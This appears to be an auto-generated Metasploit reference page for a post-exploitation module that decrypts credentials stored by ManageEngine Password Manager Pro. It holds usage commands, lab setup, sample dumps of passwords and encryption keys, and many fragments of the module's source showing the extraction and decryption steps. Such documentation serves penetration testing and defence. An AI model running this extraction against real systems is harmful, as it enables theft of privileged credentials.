Linux Gather ManageEngine Password Manager Pro Password Extractor - Metasploit
This page contains detailed information about how to use the post/linux/gather/manageengine_password_manager_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Linux Gather ManageEngine Password Manager Pro Password Extractor
Module: post/linux/gather/manageengine_password_manager_creds
Source code: modules/post/linux/gather/manageengine_password_manager_creds.rb
Disclosure date: -
Last modification time: 2022-11-02 14:03:15 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module gathers the encrypted passwords stored by Password Manager Pro and decrypt them using key materials stored in multiple configuration files.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/linux/gather/manageengine_password_manager_creds
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/linux/gather/manageengine_password_manager_creds
msf post(manageengine_password_manager_creds) > show options
... show and set options ...
msf post(manageengine_password_manager_creds) > set SESSION session-id
msf post(manageengine_password_manager_creds) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/linux/gather/manageengine_password_manager_creds")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
This post module gathers ManageEngine's Password Manager Pro credentials from the local database. This information is encrypted but all the key materials can be extracted from the application configuration files and the database itself.
This module simply starts to retrieve the database password, the database encryption key and the data encryption key, which is used to decrypt passwords also stored in the database. The result is displayed and stored in the Metasploit database.
For now, only Linux hosts are supported. This module has been tested with Password Manager Pro versions 10.5.0 (build 10501) and 12.1.0 (build 12123), both installed on Ubuntu 20.04.4 (x64).
Installation
Download ManageEngine_PMP_64bit.bin
from one of the versions at
https://archives2.manageengine.com/passwordmanagerpro/ and run the installer as
root.
For example:
$ curl -O https://archives2.manageengine.com/passwordmanagerpro/12123/ManageEngine_PMP_64bit.bin
$ chmod a+x ManageEngine_PMP_64bit.bin
$ ./ManageEngine_PMP_64bit.bin
Follow the step-by-step instructions as they appear on the screen. Enter any
location for the installation base path and select "High availability primary
server".
First, launch Password Manager Pro (PMP) in standalone mode. Depending on the
version, it is sometimes required to accept the License Agreement and select
the license type. If it is the case, select the Free license (f
).
$ cd <installation base path>/bin/
$ ./wrapper ../conf/wrapper_lin.conf
Once the first time boot process is finished, access the following URL to make sure it works: https://127.0.0.1:7272
You can test the module with PMP in standalone mode or continue for a service
installation:
Stop PMP (Ctrl-C
) and run:
$ bash ./pmp.sh install
$ /etc/init.d/pmp-service start
PMP will run in the background and logs are located in the <installation base path>/logs
folder.
You can refer to the vendor documentation.
Setup
To properly test this module, some resources and accounts will need to be added to the database:
1. Access https://127.0.0.1:7272 and login as the main administrator with the default credentials (admin
:admin
):
1. Go to the Resources
section on the left hand panel.
1. In the main panel, select Add Resource
and Add Manually
1. Fill in the required fields (select any type of resource) and click Save & Proceed
1. Start adding accounts to this resource by filling the necessary fields and click Add
1. Once you have some accounts added, click Save
1. Repeat the process to add other resources/accounts
Verification Steps
- Install the application (see #Installation)
- Start msfconsole
- Get a session
- Do:
use post/linux/gather/manageengine_password_manager_creds
- Do:
run verbose=true session=1
- Verify the installation is correctly detected
- Verify all the key material is retrieved
- Verify all the accounts are enumerated with their decrypted password
- Do:
creds
- Verify the credentials are correctly stored in the database
To test the installation path detection logic, you can repeat the process with PMP launched both in standalone mode and as a service.
Also, this is interesting to test with both a shell and Meterpreter sessions.
Note that an issue in Meterpreter makes the service detection logic fail to detect the installation path. The other process detection works normally, so it doesn't block the module execution.
Options
INSTALL_PATH
The Password Manager Pro installation path. If not provided, the module will try its best to detect it.
PG_HOST
The PostgreSQL host. Password Manager Pro run PostgreSQL locally by default, so
the default value is 127.0.0.1
.
PG_PORT
The PostgreSQL port. Default is 2345.
Scenarios
Meterpreter session on Ubuntu 20.04.4 - PMP version 12.1.0 (build 12123)
msf6 post(linux/gather/manageengine_password_manager_creds) > run verbose=true session=1
[*] Detecting installation path
[*] Trying to detect path from the Password Manager service
[-] `/etc/init.d/pmp-service` is not a symlink and the installation path cannot be detected
[*] Trying to detect path from the Password Manager related processes
[*] Installation path: /opt/ManageEngine/PMP
[*] Getting the database password
[+] Database password: BKPVR8EFqy
[*] Getting the database encryption key
[+] Found the database key configuration: /opt/ManageEngine/PMP/conf/pmp_key.key
[+] Database encryption key: crOKEnAvDftdOiW4u7fnhAD5iDBVksKYfc24mR3BZjE\=
[+] `notesdescription` field value: T-e)>(72LJCC7007
Password Manager Pro Credentials
================================
Resource Name Resource URL Account Notes Login Name Password
------------- ------------ ----------- ---------- --------
Resource 1 https://foomsf.com Admin creds Administrator P@ssw0rd!
Resource 1 https://foomsf.com Op creds Operator MySuperStrongPassword
Resource 1 https://foomsf.com Test account TestUser 12345678
Resource2 https://mysql.foomsf.com SQL admin master MyP@sswd123$
Resource2 https://mysql.foomsf.com web db password webdb 123webpassW0Rd@
[*] Post module execution completed
msf6 post(linux/gather/manageengine_password_manager_creds) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.177.152 Administrator P@ssw0rd! Password
192.168.177.152 Operator MySuperStrongPassword Password
192.168.177.152 TestUser 12345678 Password
192.168.177.152 master MyP@sswd123$ Password
192.168.177.152 webdb 123webpassW0Rd@ Password
Shell session on Ubuntu 20.04.4 - PMP version 12.1.0 (build 12123)
msf6 post(linux/gather/manageengine_password_manager_creds) > run verbose=true session=2
[*] Detecting installation path
[*] Trying to detect path from the Password Manager service
[*] Installation path: /opt/ManageEngine/PMP
[*] Getting the database password
[+] Database password: BKPVR8EFqy
[*] Getting the database encryption key
[+] Found the database key configuration: /opt/ManageEngine/PMP/conf/pmp_key.key
[+] Database encryption key: crOKEnAvDftdOiW4u7fnhAD5iDBVksKYfc24mR3BZjE\=
[+] `notesdescription` field value: T-e)>(72LJCC7007
Password Manager Pro Credentials
================================
Resource Name Resource URL Account Notes Login Name Password
------------- ------------ ----------- ---------- --------
Resource 1 https://foomsf.com Admin creds Administrator P@ssw0rd!
Resource 1 https://foomsf.com Op creds Operator MySuperStrongPassword
Resource 1 https://foomsf.com Test account TestUser 12345678
Resource2 https://mysql.foomsf.com SQL admin master MyP@sswd123$
Resource2 https://mysql.foomsf.com web db password webdb 123webpassW0Rd@
[*] Post module execution completed
msf6 post(linux/gather/manageengine_password_manager_creds) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.177.152 Administrator P@ssw0rd! Password
192.168.177.152 Operator MySuperStrongPassword Password
192.168.177.152 TestUser 12345678 Password
192.168.177.152 master MyP@sswd123$ Password
192.168.177.152 webdb 123webpassW0Rd@ Password
Go back to menu.
Msfconsole Usage
Here is how the linux/gather/manageengine_password_manager_creds post exploitation module looks in the msfconsole:
msf6 > use post/linux/gather/manageengine_password_manager_creds
msf6 post(linux/gather/manageengine_password_manager_creds) > show info
Name: Linux Gather ManageEngine Password Manager Pro Password Extractor
Module: post/linux/gather/manageengine_password_manager_creds
Platform: Unix, Linux
Arch:
Rank: Normal
Provided by:
Travis Kaun
Rob Simon
Charles Yost
Christophe De La Fuente
Module stability:
crash-safe
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
INSTALL_PATH no The Password Manager Pro installation path. The module will try to auto detect it if not set.
PG_HOST 127.0.0.1 no The PostgreSQL host
PG_PORT 2345 no The PostgreSQL port
SESSION yes The session to run this module on
Description:
This module gathers the encrypted passwords stored by Password
Manager Pro and decrypt them using key materials stored in multiple
configuration files.
References:
https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/
https://github.com/trustedsec/Zoinks/blob/main/zoinks.py
Module Options
This is a complete list of options available in the linux/gather/manageengine_password_manager_creds post exploitation module:
msf6 post(linux/gather/manageengine_password_manager_creds) > show options
Module options (post/linux/gather/manageengine_password_manager_creds):
Name Current Setting Required Description
---- --------------- -------- -----------
INSTALL_PATH no The Password Manager Pro installation path. The module will try to auto detect it if not set.
PG_HOST 127.0.0.1 no The PostgreSQL host
PG_PORT 2345 no The PostgreSQL port
SESSION yes The session to run this module on
Advanced Options
Here is a complete list of advanced options supported by the linux/gather/manageengine_password_manager_creds post exploitation module:
msf6 post(linux/gather/manageengine_password_manager_creds) > show advanced
Module advanced options (post/linux/gather/manageengine_password_manager_creds):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the linux/gather/manageengine_password_manager_creds module can do:
msf6 post(linux/gather/manageengine_password_manager_creds) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the linux/gather/manageengine_password_manager_creds post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(linux/gather/manageengine_password_manager_creds) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Cannot detect the installation path from the PMP processes
- Error when reading `<PMP_SERVICE_PATH>`: <E>
- PMP service script `<PMP_SERVICE_PATH>` not found
- `<PMP_SERVICE_PATH>` is not a symlink and the installation path cannot be detected
- Error when executing `<CMD>`: <E>
- Cannot resolve the symlink <PMP_SERVICE_PATH>
- Cannot detect the installation path from the resolved symlink `<PMP_SERVICE_REAL>`
- Error reading `<DB_PATH>`: <E>
- Database configuration file `<DB_PATH>` not found
- Unable to retrieve the database password
- Error reading `<MANAGE_KEY_CONF_PATH>`: <E>
- Database manage_key configuration file `<MANAGE_KEY_CONF_PATH>` not found
- Database key configuration file `<PMP_KEY_PATH>` not found
- Error reading `<PMP_KEY_PATH>`: <E>
- Database key configuration file <PMP_KEY_PATH> not found
- Cannot find `pgsql` in the installation path `<PSQL>`
- psql returned an error: <RESULT>
- Error while querying `Ptrx_NotesInfo` table with `psql`: <E>
- Error while dumping credentials with `psql`: <E>
- Error reporting credentials `<USERNAME>:<PASSWORD>`: <E>
- Unable to detect the PMP installation path. Use the INSTALL_PATH option instead.
- Unable to get the database password
- Unable to get the database encryption key
- Unable to get `notesdescription` from the database
- No credentials found in the database
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Cannot detect the installation path from the PMP processes
Here is a relevant code snippet related to the "Cannot detect the installation path from the PMP processes" error message:
70: found_path = shell_get_processes&.find do |process|
71: process['name'] =~ /pmp.*#{path}/i
72: end
73: return found_path['name'].split(path).first if found_path
74: end
75: vprint_error('Cannot detect the installation path from the PMP processes')
76:
77: nil
78: end
79:
80: def detect_service
Error when reading `<PMP_SERVICE_PATH>`: <E>
Here is a relevant code snippet related to the "Error when reading `<PMP_SERVICE_PATH>`: <E>" error message:
85: pmp_service_path = "#{SERVICE_DIR}/#{PMP_SERVICE}"
86:
87: begin
88: pmp_file = stat(pmp_service_path)
89: rescue StandardError => e
90: vprint_error("Error when reading `#{pmp_service_path}`: #{e}")
91: return
92: end
93: unless pmp_file
94: vprint_error("PMP service script `#{pmp_service_path}` not found")
95: return
PMP service script `<PMP_SERVICE_PATH>` not found
Here is a relevant code snippet related to the "PMP service script `<PMP_SERVICE_PATH>` not found" error message:
89: rescue StandardError => e
90: vprint_error("Error when reading `#{pmp_service_path}`: #{e}")
91: return
92: end
93: unless pmp_file
94: vprint_error("PMP service script `#{pmp_service_path}` not found")
95: return
96: end
97:
98: unless pmp_file.symlink?
99: vprint_error("`#{pmp_service_path}` is not a symlink and the installation path cannot be detected")
`<PMP_SERVICE_PATH>` is not a symlink and the installation path cannot be detected
Here is a relevant code snippet related to the "`<PMP_SERVICE_PATH>` is not a symlink and the installation path cannot be detected" error message:
94: vprint_error("PMP service script `#{pmp_service_path}` not found")
95: return
96: end
97:
98: unless pmp_file.symlink?
99: vprint_error("`#{pmp_service_path}` is not a symlink and the installation path cannot be detected")
100: return
101: end
102:
103: begin
104: cmd = "readlink -f '#{pmp_service_path}'"
Error when executing `<CMD>`: <E>
Here is a relevant code snippet related to the "Error when executing `<CMD>`: <E>" error message:
102:
103: begin
104: cmd = "readlink -f '#{pmp_service_path}'"
105: pmp_service_real = cmd_exec(cmd)
106: rescue StandardError => e
107: vprint_error("Error when executing `#{cmd}`: #{e}")
108: return
109: end
110: unless pmp_service_real
111: vprint_error("Cannot resolve the symlink #{pmp_service_path}")
112: end
Cannot resolve the symlink <PMP_SERVICE_PATH>
Here is a relevant code snippet related to the "Cannot resolve the symlink <PMP_SERVICE_PATH>" error message:
106: rescue StandardError => e
107: vprint_error("Error when executing `#{cmd}`: #{e}")
108: return
109: end
110: unless pmp_service_real
111: vprint_error("Cannot resolve the symlink #{pmp_service_path}")
112: end
113:
114: install_dir = pmp_service_real.split('/')
115: if install_dir.pop(2) == ['bin', PMP_SERVICE]
116: return install_dir.join('/')
Cannot detect the installation path from the resolved symlink `<PMP_SERVICE_REAL>`
Here is a relevant code snippet related to the "Cannot detect the installation path from the resolved symlink `<PMP_SERVICE_REAL>`" error message:
114: install_dir = pmp_service_real.split('/')
115: if install_dir.pop(2) == ['bin', PMP_SERVICE]
116: return install_dir.join('/')
117: end
118:
119: vprint_error("Cannot detect the installation path from the resolved symlink `#{pmp_service_real}`")
120:
121: nil
122: end
123:
124: def detect_install_path
Error reading `<DB_PATH>`: <E>
Here is a relevant code snippet related to the "Error reading `<DB_PATH>`: <E>" error message:
147: db_path = "#{install_path}/#{DB_CONF_PATH}"
148:
149: begin
150: db_conf = read_file(db_path)
151: rescue StandardError => e
152: print_error("Error reading `#{db_path}`: #{e}")
153: return
154: end
155: unless db_conf
156: print_error("Database configuration file `#{db_path}` not found")
157: return
Database configuration file `<DB_PATH>` not found
Here is a relevant code snippet related to the "Database configuration file `<DB_PATH>` not found" error message:
151: rescue StandardError => e
152: print_error("Error reading `#{db_path}`: #{e}")
153: return
154: end
155: unless db_conf
156: print_error("Database configuration file `#{db_path}` not found")
157: return
158: end
159:
160: b64_password = db_conf.match(/password=(.+)$/)&.captures&.first
161: unless b64_password
Unable to retrieve the database password
Here is a relevant code snippet related to the "Unable to retrieve the database password" error message:
157: return
158: end
159:
160: b64_password = db_conf.match(/password=(.+)$/)&.captures&.first
161: unless b64_password
162: print_error('Unable to retrieve the database password')
163: return
164: end
165:
166: decrypt_text(b64_password, enc_key)
167: end
Error reading `<MANAGE_KEY_CONF_PATH>`: <E>
Here is a relevant code snippet related to the "Error reading `<MANAGE_KEY_CONF_PATH>`: <E>" error message:
171:
172: manage_key_conf_path = "#{install_path}/#{MANAGE_KEY_CONF_PATH}"
173: begin
174: pmp_key_path = read_file(manage_key_conf_path)
175: rescue StandardError => e
176: print_error("Error reading `#{manage_key_conf_path}`: #{e}")
177: return
178: end
179: unless pmp_key_path
180: print_error("Database manage_key configuration file `#{manage_key_conf_path}` not found")
181: return
Database manage_key configuration file `<MANAGE_KEY_CONF_PATH>` not found
Here is a relevant code snippet related to the "Database manage_key configuration file `<MANAGE_KEY_CONF_PATH>` not found" error message:
175: rescue StandardError => e
176: print_error("Error reading `#{manage_key_conf_path}`: #{e}")
177: return
178: end
179: unless pmp_key_path
180: print_error("Database manage_key configuration file `#{manage_key_conf_path}` not found")
181: return
182: end
183: unless exist?(pmp_key_path)
184: print_error("Database key configuration file `#{pmp_key_path}` not found")
185: return
Database key configuration file `<PMP_KEY_PATH>` not found
Here is a relevant code snippet related to the "Database key configuration file `<PMP_KEY_PATH>` not found" error message:
179: unless pmp_key_path
180: print_error("Database manage_key configuration file `#{manage_key_conf_path}` not found")
181: return
182: end
183: unless exist?(pmp_key_path)
184: print_error("Database key configuration file `#{pmp_key_path}` not found")
185: return
186: end
187: vprint_good("Found the database key configuration: #{pmp_key_path}")
188:
189: begin
Error reading `<PMP_KEY_PATH>`: <E>
Here is a relevant code snippet related to the "Error reading `<PMP_KEY_PATH>`: <E>" error message:
187: vprint_good("Found the database key configuration: #{pmp_key_path}")
188:
189: begin
190: pmp_key = read_file(pmp_key_path)
191: rescue StandardError => e
192: print_error("Error reading `#{pmp_key_path}`: #{e}")
193: return
194: end
195: unless pmp_key
196: print_error("Database key configuration file #{pmp_key_path} not found")
197: return
Database key configuration file <PMP_KEY_PATH> not found
Here is a relevant code snippet related to the "Database key configuration file <PMP_KEY_PATH> not found" error message:
191: rescue StandardError => e
192: print_error("Error reading `#{pmp_key_path}`: #{e}")
193: return
194: end
195: unless pmp_key
196: print_error("Database key configuration file #{pmp_key_path} not found")
197: return
198: end
199:
200: pmp_key.match(/ENCRYPTIONKEY=(.+)$/)&.captures&.first
201: end
Cannot find `pgsql` in the installation path `<PSQL>`
Here is a relevant code snippet related to the "Cannot find `pgsql` in the installation path `<PSQL>`" error message:
210:
211: def psql_path(install_path)
212: return @psql_path if @psql_path
213:
214: psql = "#{install_path}/pgsql/bin/psql"
215: raise Rex::RuntimeError, "Cannot find `pgsql` in the installation path `#{psql}`" unless exist?(psql)
216:
217: @psql_path = psql
218: end
219:
220: def query_db(query, install_path, db_password)
psql returned an error: <RESULT>
Here is a relevant code snippet related to the "psql returned an error: <RESULT>" error message:
221: cmd = "env PGPASSWORD=#{db_password} #{psql_path(install_path)} -w -A -t -h #{pg_host} -p #{pg_port} -U pmpuser -d PassTrix -c "
222: cmd << "\"#{query}\""
223: dlog("psql command: #{cmd}")
224:
225: result, success = cmd_exec_with_result(cmd)
226: raise Rex::RuntimeError, "psql returned an error: #{result}" unless success
227:
228: result
229: end
230:
231: def process_key(key)
Error while querying `Ptrx_NotesInfo` table with `psql`: <E>
Here is a relevant code snippet related to the "Error while querying `Ptrx_NotesInfo` table with `psql`: <E>" error message:
239: def get_notesdescription(install_path, db_password, db_enc_key)
240: begin
241: cmd = 'SELECT notesdescription FROM Ptrx_NotesInfo'
242: b64_notesdescription = query_db(cmd, install_path, db_password)
243: rescue StandardError => e
244: print_error("Error while querying `Ptrx_NotesInfo` table with `psql`: #{e}")
245: return
246: end
247:
248: enc_key = process_key(db_enc_key)
249: decrypt_text(b64_notesdescription, enc_key)
Error while dumping credentials with `psql`: <E>
Here is a relevant code snippet related to the "Error while dumping credentials with `psql`: <E>" error message:
260: LEFT JOIN ptrx_password ON ptrx_passbasedauthen.PASSWDID = ptrx_password.PASSWDID
261: LEFT JOIN ptrx_account ON ptrx_passbasedauthen.PASSWDID = ptrx_account.PASSWDID
262: LEFT JOIN ptrx_resource ON ptrx_account.RESOURCEID = ptrx_resource.RESOURCEID"
263: passwords = query_db(cmd, install_path, db_password)
264: rescue StandardError => e
265: print_error("Error while dumping credentials with `psql`: #{e}")
266: return
267: end
268:
269: enc_key = process_key(db_enc_key)
270: passwords.each_line.map do |password|
Error reporting credentials `<USERNAME>:<PASSWORD>`: <E>
Here is a relevant code snippet related to the "Error reporting credentials `<USERNAME>:<PASSWORD>`: <E>" error message:
284: username: username,
285: workspace_id: myworkspace_id
286: }
287: create_credential(credential_data)
288: rescue StandardError => e
289: vprint_error("Error reporting credentials `#{username}:#{password}`: #{e}")
290: elog(e)
291: end
292:
293: def display_and_report(resource_credentials)
294: cred_tbl = Rex::Text::Table.new({
Unable to detect the PMP installation path. Use the INSTALL_PATH option instead.
Here is a relevant code snippet related to the "Unable to detect the PMP installation path. Use the INSTALL_PATH option instead." error message:
314:
315: def run
316: install_path = datastore['INSTALL_PATH'].blank? ? detect_install_path : datastore['INSTALL_PATH']
317: unless install_path
318: fail_with(Failure::BadConfig,
319: 'Unable to detect the PMP installation path. Use the INSTALL_PATH option instead.')
320: end
321: print_status("Installation path: #{install_path}")
322:
323: encryption_key = Digest::MD5.new.update(HARDCODED_KEY).hexdigest
324:
Unable to get the database password
Here is a relevant code snippet related to the "Unable to get the database password" error message:
322:
323: encryption_key = Digest::MD5.new.update(HARDCODED_KEY).hexdigest
324:
325: db_password = get_db_password(install_path, encryption_key)
326: unless db_password
327: fail_with(Failure::Unknown, 'Unable to get the database password')
328: end
329: print_good("Database password: #{db_password}")
330:
331: db_enc_key = get_db_enc_key(install_path)
332: unless db_enc_key
Unable to get the database encryption key
Here is a relevant code snippet related to the "Unable to get the database encryption key" error message:
328: end
329: print_good("Database password: #{db_password}")
330:
331: db_enc_key = get_db_enc_key(install_path)
332: unless db_enc_key
333: fail_with(Failure::Unknown, 'Unable to get the database encryption key')
334: end
335: print_good("Database encryption key: #{db_enc_key}")
336:
337: notesdescription = get_notesdescription(install_path, db_password, db_enc_key)
338: unless notesdescription
Unable to get `notesdescription` from the database
Here is a relevant code snippet related to the "Unable to get `notesdescription` from the database" error message:
334: end
335: print_good("Database encryption key: #{db_enc_key}")
336:
337: notesdescription = get_notesdescription(install_path, db_password, db_enc_key)
338: unless notesdescription
339: fail_with(Failure::Unknown, 'Unable to get `notesdescription` from the database')
340: end
341: print_good("`notesdescription` field value: #{notesdescription}")
342:
343: resource_credentials = dump_credentials(install_path, db_password, db_enc_key, notesdescription)
344: unless resource_credentials
No credentials found in the database
Here is a relevant code snippet related to the "No credentials found in the database" error message:
340: end
341: print_good("`notesdescription` field value: #{notesdescription}")
342:
343: resource_credentials = dump_credentials(install_path, db_password, db_enc_key, notesdescription)
344: unless resource_credentials
345: fail_with(Failure::Unknown, 'No credentials found in the database')
346: end
347:
348: display_and_report(resource_credentials)
349: end
350: end
Go back to menu.
Related Pull Requests
References
- CVE: Not available
- https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/
- https://github.com/trustedsec/Zoinks/blob/main/zoinks.py
See Also
Check also the following modules related to this module:
- post/linux/gather/checkcontainer
- post/linux/gather/checkvm
- post/linux/gather/ecryptfs_creds
- post/linux/gather/enum_commands
- post/linux/gather/enum_configs
- post/linux/gather/enum_containers
- post/linux/gather/enum_nagios_xi
- post/linux/gather/enum_network
- post/linux/gather/enum_protections
- post/linux/gather/enum_psk
- post/linux/gather/enum_system
- post/linux/gather/enum_users_history
- post/linux/gather/gnome_commander_creds
- post/linux/gather/gnome_keyring_dump
- post/linux/gather/haserl_read
- post/linux/gather/hashdump
- post/linux/gather/mimipenguin
- post/linux/gather/mount_cifs_creds
- post/linux/gather/openvpn_credentials
- post/linux/gather/phpmyadmin_credsteal
- post/linux/gather/pptpd_chap_secrets
- post/linux/gather/tor_hiddenservices
- post/linux/gather/vcenter_secrets_dump
Authors
- Travis Kaun
- Rob Simon
- Charles Yost
- Christophe De La Fuente
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.